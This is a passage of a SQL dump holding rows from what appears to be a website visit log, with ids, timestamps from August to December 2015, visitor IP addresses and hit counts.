00:22:08','157.55.39.166',1),(2025,1,'2015-08-12 01:04:04','46.4.189.109',1),(2026,1,'2015-08-12 10:49:25','45.114.49.18',1),(2027,1,'2015-08-12 11:15:24','157.55.39.14',3),(2028,1,'2015-08-12 14:29:26','66.249.79.148',1),(2029,1,'2015-08-12 15:26:41','204.124.183.98',1),(2030,1,'2015-08-12 16:49:27','207.46.13.56',1),(2031,1,'2015-08-12 17:33:52','45.114.49.18',1),(2032,1,'2015-08-13 03:00:16','73.133.156.46',1),(2033,1,'2015-08-13 14:21:25','69.30.153.200',1),(2034,1,'2015-08-14 01:06:35','173.224.126.253',1),(2035,1,'2015-08-14 10:24:26','72.84.203.6',1),(2036,1,'2015-08-15 19:06:26','204.236.235.245',1),(2037,1,'2015-08-15 23:55:16','66.249.79.148',2),(2038,1,'2015-08-18 04:37:27','157.55.39.50',1),(2039,1,'2015-08-19 11:53:06','68.180.229.38',1),(2040,1,'2015-08-19 14:55:50','54.204.175.57',2),(2041,1,'2015-08-21 01:12:53','204.124.183.98',1),(2042,1,'2015-08-21 14:54:41','54.144.250.111',2),(2043,1,'2015-08-22 03:08:07','162.244.15.149',1),(2044,1,'2015-08-22 10:03:15','133.130.63.178',2),(2045,1,'2015-08-22 15:28:45','74.61.254.173',2),(2046,1,'2015-08-22 17:03:57','82.208.160.181',1),(2047,1,'2015-08-23 01:32:04','107.170.42.7',2),(2048,1,'2015-08-24 01:31:02','66.249.79.70',1),(2049,1,'2015-08-24 03:24:23','66.249.79.76',1),(2050,1,'2015-08-24 13:18:43','54.144.133.161',2),(2051,1,'2015-08-24 17:06:08','74.11.223.130',3),(2052,1,'2015-08-24 23:54:06','68.180.229.38',2),(2053,1,'2015-08-25 00:20:36','66.249.79.70',3),(2054,1,'2015-08-25 15:11:07','54.158.130.161',4),(2055,1,'2015-08-26 04:58:49','180.76.15.153',1),(2056,1,'2015-08-27 01:32:47','96.255.58.199',1),(2057,1,'2015-08-27 02:12:25','162.244.15.108',1),(2058,1,'2015-08-28 05:17:32','144.76.64.115',1),(2059,1,'2015-08-28 16:58:18','68.180.229.38',1),(2060,1,'2015-08-29 01:36:23','157.55.39.82',1),(2061,1,'2015-08-29 07:59:13','45.55.47.222',1),(2062,1,'2015-08-29 20:18:30','157.55.39.92',1),(2063,1,'2015-08-30 19:35:55','180.76.15.163',1),(2064,1,'2015-08-31 19:57:43','195.154.60.147',1),(2065,1,'2015-09-01 02:47:30','157.55.39.14',1),(2066,1,'2015-09-01 06:25:48','167.114.172.225',2),(2067,1,'2015-09-01 09:36:49','180.76.15.20',1),(2068,1,'2015-09-01 13:31:46','173.233.57.214',2),(2069,1,'2015-09-02 12:49:52','220.181.108.180',1),(2070,1,'2015-09-02 14:01:00','123.125.71.74',2),(2071,1,'2015-09-03 11:20:42','204.124.183.98',1),(2072,1,'2015-09-04 08:44:11','66.249.79.177',1),(2073,1,'2015-09-04 11:20:45','207.46.13.78',1),(2074,1,'2015-09-04 16:46:17','52.25.119.87',2),(2075,1,'2015-09-05 14:32:44','74.61.254.173',1),(2076,1,'2015-09-06 02:18:40','72.71.128.56',2),(2077,1,'2015-09-07 01:55:13','207.46.13.21',1),(2078,1,'2015-09-07 05:32:12','37.187.56.81',2),(2079,1,'2015-09-08 01:23:36','107.170.172.145',2),(2080,1,'2015-09-08 16:30:41','157.55.39.22',1),(2081,1,'2015-09-08 23:09:09','188.165.112.228',1),(2082,1,'2015-09-09 22:32:07','185.53.44.158',1),(2083,1,'2015-09-10 00:53:35','74.61.254.173',1),(2084,1,'2015-09-10 12:00:15','185.53.44.157',1),(2085,1,'2015-09-10 17:40:20','65.207.116.226',2),(2086,1,'2015-09-10 21:43:23','207.46.13.136',1),(2087,1,'2015-09-11 04:48:54','98.117.37.102',1),(2088,1,'2015-09-11 09:14:19','69.58.178.59',2),(2089,1,'2015-09-11 17:46:31','204.124.183.98',1),(2090,1,'2015-09-11 19:33:03','107.0.121.66',2),(2091,1,'2015-09-11 21:47:24','207.46.13.136',1),(2092,1,'2015-09-11 22:16:52','68.134.30.209',1),(2093,1,'2015-09-12 12:31:13','77.75.77.11',1),(2094,1,'2015-09-13 09:28:28','118.100.88.71',4),(2095,1,'2015-09-13 13:46:53','108.56.169.214',1),(2096,1,'2015-09-13 17:55:41','66.249.79.177',1),(2097,1,'2015-09-13 20:24:32','209.249.5.250',2),(2098,1,'2015-09-13 23:52:38','217.69.133.231',1),(2099,1,'2015-09-14 09:32:18','180.76.15.33',1),(2100,1,'2015-09-14 14:01:42','157.55.39.136',1),(2101,1,'2015-09-14 20:41:30','73.128.239.83',1),(2102,1,'2015-09-15 07:12:30','78.158.11.226',1),(2103,1,'2015-09-15 13:47:18','144.76.64.115',1),(2104,1,'2015-09-15 14:56:21','217.69.133.232',1),(2105,1,'2015-09-15 17:23:32','207.46.13.29',1),(2106,1,'2015-09-16 00:52:33','52.26.115.151',3),(2107,1,'2015-09-16 01:43:23','173.252.88.92',1),(2108,1,'2015-09-16 16:32:04','180.76.15.20',1),(2109,1,'2015-09-16 22:47:14','207.46.13.29',1),(2110,1,'2015-09-17 16:24:36','204.124.183.98',1),(2111,1,'2015-09-18 13:20:53','81.182.85.7',2),(2112,1,'2015-09-19 03:10:42','66.249.79.191',1),(2113,1,'2015-09-20 00:20:03','75.131.10.229',2),(2114,1,'2015-09-20 10:52:41','69.138.75.253',1),(2115,1,'2015-09-20 15:13:25','96.244.78.106',1),(2116,1,'2015-09-21 00:57:11','96.244.78.106',1),(2117,1,'2015-09-21 02:07:56','123.125.71.39',1),(2118,1,'2015-09-21 03:36:09','188.165.233.228',2),(2119,1,'2015-09-21 08:29:54','207.46.13.179',1),(2120,1,'2015-09-21 10:56:24','207.46.13.179',1),(2121,1,'2015-09-21 14:47:26','71.178.136.19',1),(2122,1,'2015-09-22 12:20:48','96.244.78.106',1),(2123,1,'2015-09-22 17:31:22','96.244.78.106',1),(2124,1,'2015-09-22 20:12:00','68.180.229.38',1),(2125,1,'2015-09-23 12:58:54','96.244.78.106',1),(2126,1,'2015-09-23 18:00:45','74.11.223.130',2),(2127,1,'2015-09-24 00:52:38','66.249.79.191',1),(2128,1,'2015-09-24 04:06:06','162.243.94.193',3),(2129,1,'2015-09-24 15:42:25','162.115.236.102',2),(2130,1,'2015-09-25 02:38:13','96.244.78.106',1),(2131,1,'2015-09-25 17:32:24','205.222.248.62',2),(2132,1,'2015-09-26 00:39:25','162.244.15.160',1),(2133,1,'2015-09-27 08:56:41','178.33.131.105',1),(2134,1,'2015-09-27 14:50:52','220.181.108.149',1),(2135,1,'2015-09-27 17:59:31','108.18.158.46',3),(2136,1,'2015-09-27 18:00:35','108.18.158.46',3),(2137,1,'2015-09-27 23:44:19','68.180.229.38',1),(2138,1,'2015-09-28 00:41:01','207.46.13.119',3),(2139,1,'2015-09-28 10:09:32','207.46.13.167',1),(2140,1,'2015-09-28 15:42:11','204.124.183.98',1),(2141,1,'2015-09-28 16:50:41','180.76.15.143',1),(2142,1,'2015-09-28 20:15:08','205.222.248.98',1),(2143,1,'2015-09-29 21:23:06','78.46.174.55',4),(2144,1,'2015-09-30 17:52:15','108.3.176.210',1),(2145,1,'2015-10-01 22:16:24','205.222.248.8',1),(2146,1,'2015-10-02 14:00:52','96.244.78.106',1),(2147,1,'2015-10-02 20:55:28','180.76.15.22',1),(2148,1,'2015-10-03 15:20:01','66.220.158.118',1),(2149,1,'2015-10-03 21:18:01','180.76.15.142',1),(2150,1,'2015-10-03 22:05:23','71.121.187.46',3),(2151,1,'2015-10-03 23:01:14','71.121.187.46',1),(2152,1,'2015-10-04 02:52:57','73.213.236.114',1),(2153,1,'2015-10-04 05:05:55','207.46.13.23',1),(2154,1,'2015-10-04 20:20:26','108.34.32.145',4),(2155,1,'2015-10-05 04:11:44','157.55.39.101',2),(2156,1,'2015-10-05 12:51:51','142.4.215.116',2),(2157,1,'2015-10-05 23:44:36','68.180.229.38',1),(2158,1,'2015-10-06 00:12:40','96.244.78.106',1),(2159,1,'2015-10-06 06:31:21','54.82.119.244',2),(2160,1,'2015-10-06 08:45:56','180.76.15.6',2),(2161,1,'2015-10-06 12:35:28','207.46.13.29',1),(2162,1,'2015-10-07 02:00:58','98.231.164.158',1),(2163,1,'2015-10-07 09:44:42','207.46.13.29',1),(2164,1,'2015-10-07 11:54:59','207.46.13.57',1),(2165,1,'2015-10-07 14:59:57','74.120.68.243',1),(2166,1,'2015-10-08 00:44:20','172.56.2.222',1),(2167,1,'2015-10-08 17:21:40','73.129.30.214',1),(2168,1,'2015-10-09 10:54:42','167.102.133.216',2),(2169,1,'2015-10-09 15:07:52','107.173.248.117',2),(2170,1,'2015-10-09 20:40:44','66.249.69.61',1),(2171,1,'2015-10-10 13:50:34','204.124.183.98',1),(2172,1,'2015-10-10 14:07:45','144.76.64.115',1),(2173,1,'2015-10-10 20:10:26','73.129.127.175',1),(2174,1,'2015-10-11 08:59:00','69.58.178.56',2),(2175,1,'2015-10-11 14:38:49','64.134.70.9',1),(2176,1,'2015-10-13 03:38:46','162.243.105.208',2),(2177,1,'2015-10-13 05:55:37','157.55.39.116',1),(2178,1,'2015-10-13 18:41:03','204.126.132.241',1),(2179,1,'2015-10-13 20:05:54','142.4.218.156',2),(2180,1,'2015-10-14 10:41:38','54.234.110.142',1),(2181,1,'2015-10-15 12:08:34','107.173.248.58',1),(2182,1,'2015-10-15 22:56:15','204.153.77.3',1),(2183,1,'2015-10-16 06:13:03','157.55.39.218',1),(2184,1,'2015-10-16 20:06:38','207.76.142.9',1),(2185,1,'2015-10-17 02:48:42','120.59.64.35',1),(2186,1,'2015-10-17 10:49:22','66.249.75.142',1),(2187,1,'2015-10-17 22:31:44','123.125.71.87',1),(2188,1,'2015-10-17 23:27:06','141.8.143.198',1),(2189,1,'2015-10-18 20:03:29','188.143.232.26',1),(2190,1,'2015-10-18 23:37:43','157.55.39.153',1),(2191,1,'2015-10-19 02:18:52','157.55.39.153',1),(2192,1,'2015-10-19 03:40:15','188.143.232.26',1),(2193,1,'2015-10-19 05:19:10','98.233.143.92',2),(2194,1,'2015-10-19 10:34:55','188.143.232.26',1),(2195,1,'2015-10-19 13:47:34','74.11.223.130',1),(2196,1,'2015-10-19 15:55:26','37.187.56.47',2),(2197,1,'2015-10-19 18:35:52','205.222.248.62',1),(2198,1,'2015-10-19 19:42:15','188.143.232.62',1),(2199,1,'2015-10-19 20:48:50','158.103.0.1',1),(2200,1,'2015-10-20 01:36:13','5.9.44.13',1),(2201,1,'2015-10-20 18:54:31','173.252.112.107',1),(2202,1,'2015-10-21 00:28:54','68.180.229.38',1),(2203,1,'2015-10-21 10:34:34','204.124.183.98',1),(2204,1,'2015-10-21 13:27:22','23.95.199.169',2),(2205,1,'2015-10-21 19:36:35','66.250.190.25',1),(2206,1,'2015-10-22 10:42:09','71.244.255.21',1),(2207,1,'2015-10-22 13:54:36','43.252.228.25',2),(2208,1,'2015-10-22 14:54:00','78.158.11.226',1),(2209,1,'2015-10-22 17:46:02','220.181.108.91',1),(2210,1,'2015-10-22 18:20:33','157.55.39.31',3),(2211,1,'2015-10-22 21:46:38','50.166.75.99',2),(2212,1,'2015-10-23 10:25:29','69.84.207.246',4),(2213,1,'2015-10-23 15:39:02','157.55.39.31',2),(2214,1,'2015-10-24 10:44:37','123.125.71.15',1),(2215,1,'2015-10-24 19:59:28','188.143.232.26',3),(2216,1,'2015-10-26 13:50:21','188.143.232.34',3),(2217,1,'2015-10-26 18:09:32','77.75.77.101',1),(2218,1,'2015-10-27 09:13:23','66.44.63.106',1),(2219,1,'2015-10-27 13:10:21','23.94.154.173',1),(2220,1,'2015-10-28 02:50:21','157.55.39.218',1),(2221,1,'2015-10-28 11:56:37','66.249.79.48',1),(2222,1,'2015-10-29 04:32:24','64.79.100.21',4),(2223,1,'2015-10-30 01:31:44','207.46.13.90',2),(2224,1,'2015-10-30 06:16:28','188.143.232.10',1),(2225,1,'2015-10-30 11:06:55','192.199.247.38',2),(2226,1,'2015-10-30 22:44:40','157.55.39.224',2),(2227,1,'2015-11-01 02:37:31','64.234.50.112',1),(2228,1,'2015-11-01 13:01:02','104.54.236.254',1),(2229,1,'2015-11-02 05:09:08','192.95.29.116',2),(2230,1,'2015-11-02 09:02:39','76.21.232.239',1),(2231,1,'2015-11-02 11:11:17','91.121.100.66',1),(2232,1,'2015-11-02 15:53:32','157.55.39.172',1),(2233,1,'2015-11-02 16:06:07','192.227.133.19',1),(2234,1,'2015-11-02 17:32:30','157.55.39.173',1),(2235,1,'2015-11-02 21:08:51','207.46.13.106',1),(2236,1,'2015-11-03 01:44:33','98.233.117.13',4),(2237,1,'2015-11-03 10:52:22','71.121.239.173',1),(2238,1,'2015-11-03 18:46:52','78.46.174.55',2),(2239,1,'2015-11-04 16:44:29','207.46.13.106',1),(2240,1,'2015-11-05 14:17:22','180.76.15.135',1),(2241,1,'2015-11-05 17:02:06','66.87.81.8',1),(2242,1,'2015-11-05 20:06:04','50.153.189.73',1),(2243,1,'2015-11-06 00:44:28','180.76.15.28',1),(2244,1,'2015-11-06 03:26:23','207.46.13.131',2),(2245,1,'2015-11-06 09:01:12','180.76.15.9',1),(2246,1,'2015-11-06 19:06:26','180.76.15.146',1),(2247,1,'2015-11-07 12:53:13','172.56.2.169',1),(2248,1,'2015-11-07 13:24:06','68.180.229.38',1),(2249,1,'2015-11-07 22:33:27','180.76.15.27',1),(2250,1,'2015-11-07 23:55:25','98.231.243.206',2),(2251,1,'2015-11-08 00:03:24','207.46.13.7',1),(2252,1,'2015-11-09 01:17:10','98.233.235.26',1),(2253,1,'2015-11-09 02:57:15','173.252.112.112',1),(2254,1,'2015-11-09 16:52:54','158.106.67.184',2),(2255,1,'2015-11-09 22:10:36','157.55.39.23',1),(2256,1,'2015-11-10 18:56:25','73.129.30.214',1),(2257,1,'2015-11-11 09:59:05','69.58.178.59',2),(2258,1,'2015-11-12 13:02:17','66.249.79.48',1),(2259,1,'2015-11-14 12:44:57','104.168.96.29',1),(2260,1,'2015-11-15 04:55:18','46.118.152.18',2),(2261,1,'2015-11-15 05:09:02','178.137.161.6',10),(2262,1,'2015-11-15 06:52:43','68.180.229.38',1),(2263,1,'2015-11-15 07:35:10','207.46.13.138',2),(2264,1,'2015-11-15 12:30:05','207.46.13.9',1),(2265,1,'2015-11-15 13:32:04','46.118.152.18',8),(2266,1,'2015-11-15 13:32:04','46.118.152.18',1),(2267,1,'2015-11-15 15:50:43','178.137.94.14',2),(2268,1,'2015-11-15 15:50:43','178.137.94.14',1),(2269,1,'2015-11-15 22:54:44','46.118.152.18',3),(2270,1,'2015-11-16 00:42:13','78.158.11.226',1),(2271,1,'2015-11-16 01:19:45','178.137.94.14',6),(2272,1,'2015-11-16 04:51:16','37.115.154.109',3),(2273,1,'2015-11-16 07:10:44','178.137.161.6',3),(2274,1,'2015-11-16 12:32:20','46.105.100.183',2),(2275,1,'2015-11-16 16:47:07','178.137.161.6',3),(2276,1,'2015-11-17 01:58:49','178.137.161.6',2),(2277,1,'2015-11-17 01:58:49','178.137.161.6',1),(2278,1,'2015-11-17 02:58:23','46.118.152.18',3),(2279,1,'2015-11-17 04:35:52','73.132.237.77',1),(2280,1,'2015-11-17 07:53:17','178.137.94.14',1),(2281,1,'2015-11-17 07:53:17','178.137.94.14',1),(2282,1,'2015-11-17 07:53:17','178.137.94.14',1),(2283,1,'2015-11-17 10:47:32','46.118.152.18',5),(2284,1,'2015-11-17 16:59:16','68.180.229.38',1),(2285,1,'2015-11-17 17:43:12','178.137.94.14',3),(2286,1,'2015-11-17 21:20:11','46.118.152.18',2),(2287,1,'2015-11-17 21:20:11','46.118.152.18',1),(2288,1,'2015-11-17 22:18:53','37.115.154.109',3),(2289,1,'2015-11-18 01:01:11','178.137.161.6',2),(2290,1,'2015-11-18 02:16:56','167.102.191.18',1),(2291,1,'2015-11-18 03:17:56','178.137.94.14',9),(2292,1,'2015-11-19 02:22:27','178.137.161.6',4),(2293,1,'2015-11-19 02:22:27','178.137.161.6',1),(2294,1,'2015-11-19 02:22:27','178.137.161.6',1),(2295,1,'2015-11-19 08:40:30','178.137.161.6',2),(2296,1,'2015-11-19 08:40:30','178.137.161.6',1),(2297,1,'2015-11-19 09:04:00','46.118.152.18',8),(2298,1,'2015-11-19 11:04:22','178.137.94.14',3),(2299,1,'2015-11-19 15:52:41','37.115.154.109',1),(2300,1,'2015-11-19 15:52:41','37.115.154.109',1),(2301,1,'2015-11-19 15:52:41','37.115.154.109',1),(2302,1,'2015-11-19 17:46:22','66.249.75.142',1),(2303,1,'2015-11-19 18:57:31','140.147.236.195',1),(2304,1,'2015-11-19 20:31:08','46.118.152.18',4),(2305,1,'2015-11-19 22:04:32','128.244.38.5',3),(2306,1,'2015-11-19 23:34:57','178.137.161.6',2),(2307,1,'2015-11-19 23:34:57','178.137.161.6',1),(2308,1,'2015-11-20 06:44:50','178.137.94.14',6),(2309,1,'2015-11-20 14:44:55','23.95.199.182',1),(2310,1,'2015-11-20 18:03:25','150.148.14.8',1),(2311,1,'2015-11-20 22:38:33','74.11.223.130',1),(2312,1,'2015-11-21 00:26:34','8.21.241.82',1),(2313,1,'2015-11-21 02:26:41','178.137.161.6',3),(2314,1,'2015-11-21 03:05:48','46.118.152.18',3),(2315,1,'2015-11-21 04:49:25','137.198.217.155',1),(2316,1,'2015-11-21 09:05:16','46.118.152.18',10),(2317,1,'2015-11-21 09:05:16','46.118.152.18',1),(2318,1,'2015-11-21 10:35:14','195.154.226.90',2),(2319,1,'2015-11-21 11:13:29','37.115.154.109',3),(2320,1,'2015-11-21 13:36:50','37.115.191.181',2),(2321,1,'2015-11-21 14:34:07','46.118.119.48',3),(2322,1,'2015-11-21 15:41:50','46.118.119.48',2),(2323,1,'2015-11-21 18:05:47','64.79.100.34',4),(2324,1,'2015-11-21 20:47:06','162.243.13.124',2),(2325,1,'2015-11-21 23:25:43','46.118.119.48',9),(2326,1,'2015-11-22 00:54:30','54.202.77.147',4),(2327,1,'2015-11-22 01:06:49','178.137.89.181',3),(2328,1,'2015-11-22 09:21:17','46.118.119.48',5),(2329,1,'2015-11-22 09:21:17','46.118.119.48',1),(2330,1,'2015-11-22 16:53:52','72.76.243.86',4),(2331,1,'2015-11-22 18:07:20','73.212.3.36',1),(2332,1,'2015-11-23 03:18:39','37.115.191.181',3),(2333,1,'2015-11-23 06:17:46','178.137.89.181',2),(2334,1,'2015-11-23 09:48:36','178.137.89.181',3),(2335,1,'2015-11-23 09:48:36','178.137.89.181',1),(2336,1,'2015-11-23 11:38:09','178.137.89.181',4),(2337,1,'2015-11-23 13:44:07','37.115.191.181',2),(2338,1,'2015-11-23 14:43:20','46.118.119.48',1),(2339,1,'2015-11-23 14:43:20','46.118.119.48',1),(2340,1,'2015-11-23 15:41:16','46.118.119.48',6),(2341,1,'2015-11-23 16:12:01','8.21.241.65',1),(2342,1,'2015-11-23 23:18:45','178.137.89.181',2),(2343,1,'2015-11-24 00:10:57','40.77.167.35',8),(2344,1,'2015-11-24 09:19:27','46.118.119.48',2),(2345,1,'2015-11-24 09:19:27','46.118.119.48',1),(2346,1,'2015-11-24 17:33:31','178.137.89.181',1),(2347,1,'2015-11-24 17:33:31','178.137.89.181',1),(2348,1,'2015-11-24 17:33:31','178.137.89.181',1),(2349,1,'2015-11-24 23:45:05','129.2.168.63',1),(2350,1,'2015-11-25 01:11:44','173.252.88.90',1),(2351,1,'2015-11-25 02:40:04','8.21.241.165',1),(2352,1,'2015-11-25 03:11:47','178.137.89.181',3),(2353,1,'2015-11-25 05:48:25','37.115.191.181',2),(2354,1,'2015-11-25 05:48:25','37.115.191.181',1),(2355,1,'2015-11-25 09:15:13','195.154.146.225',4),(2356,1,'2015-11-25 12:00:25','37.115.191.181',3),(2357,1,'2015-11-25 15:09:17','220.181.108.110',1),(2358,1,'2015-11-25 16:14:27','37.115.191.181',3),(2359,1,'2015-11-25 22:08:24','178.137.89.181',5),(2360,1,'2015-11-26 01:19:53','46.118.119.48',3),(2361,1,'2015-11-26 03:58:53','37.115.191.181',5),(2362,1,'2015-11-26 04:04:56','178.137.89.181',3),(2363,1,'2015-11-26 07:32:57','104.131.221.134',4),(2364,1,'2015-11-26 12:19:55','46.118.119.48',6),(2365,1,'2015-11-26 12:19:55','46.118.119.48',1),(2366,1,'2015-11-26 12:19:55','46.118.119.48',1),(2367,1,'2015-11-26 12:19:55','46.118.119.48',1),(2368,1,'2015-11-26 12:19:55','46.118.119.48',1),(2369,1,'2015-11-26 16:49:47','178.137.89.181',2),(2370,1,'2015-11-26 21:50:55','40.77.167.38',1),(2371,1,'2015-11-27 01:05:07','176.8.244.238',1),(2372,1,'2015-11-27 01:05:07','176.8.244.238',1),(2373,1,'2015-11-27 01:05:07','176.8.244.238',1),(2374,1,'2015-11-27 12:52:00','37.115.191.181',2),(2375,1,'2015-11-27 12:52:00','37.115.191.181',1),(2376,1,'2015-11-27 14:04:47','176.31.39.23',1),(2377,1,'2015-11-27 15:11:37','37.115.191.181',3),(2378,1,'2015-11-27 20:35:30','157.55.39.87',1),(2379,1,'2015-11-27 21:00:59','178.137.89.181',3),(2380,1,'2015-11-28 01:50:30','178.137.89.181',3),(2381,1,'2015-11-28 02:16:02','178.137.89.181',4),(2382,1,'2015-11-28 04:19:44','46.118.119.48',3),(2383,1,'2015-11-28 05:17:44','195.154.226.90',2),(2384,1,'2015-11-28 06:18:17','37.115.191.181',6),(2385,1,'2015-11-28 15:25:05','46.118.119.48',7),(2386,1,'2015-11-28 15:25:05','46.118.119.48',1),(2387,1,'2015-11-28 15:25:05','46.118.119.48',1),(2388,1,'2015-11-28 15:25:05','46.118.119.48',1),(2389,1,'2015-11-28 15:25:05','46.118.119.48',1),(2390,1,'2015-11-28 16:01:58','167.114.209.28',2),(2391,1,'2015-11-28 18:27:43','176.8.244.238',3),(2392,1,'2015-11-29 16:02:09','37.115.191.181',2),(2393,1,'2015-11-29 16:02:09','37.115.191.181',1),(2394,1,'2015-11-29 17:57:14','82.80.249.184',2),(2395,1,'2015-11-29 18:34:05','178.137.89.181',3),(2396,1,'2015-11-29 22:12:50','178.137.89.181',5),(2397,1,'2015-11-29 22:12:50','178.137.89.181',1),(2398,1,'2015-11-30 07:26:24','46.118.119.48',3),(2399,1,'2015-11-30 10:37:55','123.125.71.52',1),(2400,1,'2015-11-30 11:53:44','178.137.89.181',3),(2401,1,'2015-11-30 12:27:04','176.31.126.56',2),(2402,1,'2015-11-30 13:29:15','176.8.244.238',3),(2403,1,'2015-11-30 17:43:11','37.115.191.181',2),(2404,1,'2015-11-30 17:43:11','37.115.191.181',1),(2405,1,'2015-11-30 18:42:41','46.118.119.48',7),(2406,1,'2015-11-30 18:42:41','46.118.119.48',1),(2407,1,'2015-11-30 18:42:41','46.118.119.48',1),(2408,1,'2015-11-30 20:20:35','206.253.226.7',1),(2409,1,'2015-11-30 22:19:40','37.115.191.181',2),(2410,1,'2015-11-30 22:19:40','37.115.191.181',1),(2411,1,'2015-12-01 11:15:44','123.125.71.28',1),(2412,1,'2015-12-01 13:54:32','178.137.89.181',2),(2413,1,'2015-12-01 13:54:32','178.137.89.181',1),(2414,1,'2015-12-01 15:19:45','37.115.191.181',2),(2415,1,'2015-12-01 15:19:45','37.115.191.181',1),(2416,1,'2015-12-01 16:08:06','178.137.89.181',4),(2417,1,'2015-12-01 16:08:06','178.137.89.181',1),(2418,1,'2015-12-01 17:13:51','37.115.191.181',2),(2419,1,'2015-12-01 17:13:51','37.115.191.181',1),(2420,1,'2015-12-01 20:27:50','157.55.39.155',1),(2421,1,'2015-12-01 21:19:26','173.66.150.191',1),(2422,1,'2015-12-02 07:17:54','178.137.89.181',1),(2423,1,'2015-12-02 07:17:54','178.137.89.181',1),(2424,1,'2015-12-02 07:17:54','178.137.89.181',1),(2425,1,'2015-12-02 10:58:05','178.137.93.55',3),(2426,1,'2015-12-02 12:40:15','70.208.134.145',1),(2427,1,'2015-12-02 13:14:42','77.75.78.167',2),(2428,1,'2015-12-02 16:16:38','37.115.191.181',3),(2429,1,'2015-12-02 19:45:20','46.118.123.213',3),(2430,1,'2015-12-02 21:59:03','180.76.15.145',1),(2431,1,'2015-12-02 23:11:18','46.118.123.53',17),(2432,1,'2015-12-02 23:11:18','46.118.123.53',1),(2433,1,'2015-12-03 00:33:39','46.118.123.213',3),(2434,1,'2015-12-03 03:48:56','71.179.93.87',1),(2435,1,'2015-12-03 07:09:28','178.137.89.181',9),(2436,1,'2015-12-03 09:15:38','46.118.123.213',3),(2437,1,'2015-12-03 12:11:28','176.8.244.238',2),(2438,1,'2015-12-03 12:11:28','176.8.244.238',1),(2439,1,'2015-12-03 14:39:00','46.118.123.53',3),(2440,1,'2015-12-03 16:13:55','54.218.100.238',2),(2441,1,'2015-12-04 11:59:42','173.192.34.95',1),(2442,1,'2015-12-04 12:11:23','178.137.89.181',5),(2443,1,'2015-12-04 12:11:23','178.137.89.181',1),(2444,1,'2015-12-04 13:31:17','178.137.89.181',3),(2445,1,'2015-12-04 16:16:28','46.118.123.53',15),(2446,1,'2015-12-04 18:00:39','68.180.231.60',1),(2447,1,'2015-12-04 21:23:09','178.137.89.181',6),(2448,1,'2015-12-04 22:50:06','24.49.13.40',1),(2449,1,'2015-12-05 00:01:31','46.118.112.74',3),(2450,1,'2015-12-05 03:06:08','157.55.39.39',2),(2451,1,'2015-12-05 05:38:54','79.143.186.170',2),(2452,1,'2015-12-05 08:34:18','46.118.123.53',4),(2453,1,'2015-12-05 08:34:18','46.118.123.53',1),(2454,1,'2015-12-05 08:34:18','46.118.123.53',1),(2455,1,'2015-12-05 13:56:54','188.143.232.34',1),(2456,1,'2015-12-05 17:37:37','46.118.226.141',1),(2457,1,'2015-12-05 17:37:37','46.118.226.141',1),(2458,1,'2015-12-05 17:37:37','46.118.226.141',1),(2459,1,'2015-12-05 18:19:32','188.143.232.16',1),(2460,1,'2015-12-05 21:44:46','188.143.232.35',2),(2461,1,'2015-12-05 22:45:07','188.143.232.35',2),(2462,1,'2015-12-06 02:51:29','188.143.232.10',1),(2463,1,'2015-12-06 03:06:40','178.137.89.181',6),(2464,1,'2015-12-06 05:11:17','71.121.187.98',1),(2465,1,'2015-12-06 08:42:07','46.118.112.74',6),(2466,1,'2015-12-06 09:48:29','46.118.123.53',4),(2467,1,'2015-12-06 09:48:29','46.118.123.53',1),(2468,1,'2015-12-06 09:48:29','46.118.123.53',1),(2469,1,'2015-12-06 09:48:29','46.118.123.53',1),(2470,1,'2015-12-06 09:48:29','46.118.123.53',1),(2471,1,'2015-12-06 09:48:29','46.118.123.53',1),(2472,1,'2015-12-06 10:08:05','188.143.232.37',1),(2473,1,'2015-12-06 11:24:30','178.137.89.181',4),(2474,1,'2015-12-06 11:24:30','178.137.89.181',1),(2475,1,'2015-12-06 11:24:30','178.137.89.181',1),(2476,1,'2015-12-06 16:14:18','46.118.112.74',2),(2477,1,'2015-12-06 16:14:18','46.118.112.74',1),(2478,1,'2015-12-06 21:11:25','70.192.194.165',2),(2479,1,'2015-12-07 00:30:09','188.143.232.43',1),(2480,1,'2015-12-07 02:48:39','46.118.123.53',3),(2481,1,'2015-12-07 04:30:23','188.143.232.43',1),(2482,1,'2015-12-07 07:31:06','46.118.226.141',1),(2483,1,'2015-12-07 07:31:06','46.118.226.141',1),(2484,1,'2015-12-07 07:31:06','46.118.226.141',1),(2485,1,'2015-12-07 09:52:31','46.118.112.74',3),(2486,1,'2015-12-07 11:23:36','207.46.13.34',3),(2487,1,'2015-12-07 13:43:45','173.252.88.89',7),(2488,1,'2015-12-07 17:22:40','178.137.89.181',3),(2489,1,'2015-12-07 17:22:40','178.137.89.181',1),(2490,1,'2015-12-07 17:22:40','178.137.89.181',1),(2491,1,'2015-12-07 17:22:41','178.137.89.181',1),(2492,1,'2015-12-08 01:22:45','178.137.89.181',4),(2493,1,'2015-12-08 02:36:10','46.118.156.224',3),(2494,1,'2015-12-08 02:36:10','46.118.156.224',1),(2495,1,'2015-12-08 02:36:10','46.118.156.224',1),(2496,1,'2015-12-08 02:36:10','46.118.156.224',1),(2497,1,'2015-12-08 06:28:33','46.118.123.53',8),(2498,1,'2015-12-08 06:28:33','46.118.123.53',1),(2499,1,'2015-12-08 06:28:33','46.118.123.53',1),(2500,1,'2015-12-08 06:28:33','46.118.123.53',1),(2501,1,'2015-12-08 09:51:13','178.137.162.85',3),(2502,1,'2015-12-08 11:27:41','66.225.232.86',1),(2503,1,'2015-12-08 20:41:30','188.143.232.40',1),(2504,1,'2015-12-08 23:03:32','46.246.16.159',3),(2505,1,'2015-12-09 00:03:05','46.118.123.53',4),(2506,1,'2015-12-09 01:22:15','40.77.167.44',1),(2507,1,'2015-12-09 07:23:36','40.77.167.1',1),(2508,1,'2015-12-09 08:14:37','178.137.89.181',3),(2509,1,'2015-12-09 08:14:37','178.137.89.181',1),(2510,1,'2015-12-09 09:17:52','178.137.162.85',4),(2511,1,'2015-12-09 09:17:52','178.137.162.85',1),(2512,1,'2015-12-09 09:17:52','178.137.162.85',1),(2513,1,'2015-12-09 12:49:27','46.118.226.141',2),(2514,1,'2015-12-09 12:49:27','46.118.226.141',1),(2515,1,'2015-12-09 15:44:23','178.137.165.96',4),(2516,1,'2015-12-09 15:44:23','178.137.165.96',1),(2517,1,'2015-12-09 17:03:05','134.249.52.203',6),(2518,1,'2015-12-09 23:06:19','134.249.52.203',9),(2519,1,'2015-12-10 01:03:34','54.211.166.97',2),(2520,1,'2015-12-10 05:13:01','66.249.79.50',4),(2521,1,'2015-12-10 09:10:30','40.77.167.1',3),(2522,1,'2015-12-10 16:16:23','46.118.153.165',2),(2523,1,'2015-12-10 16:16:23','46.118.153.165',1),(2524,1,'2015-12-10 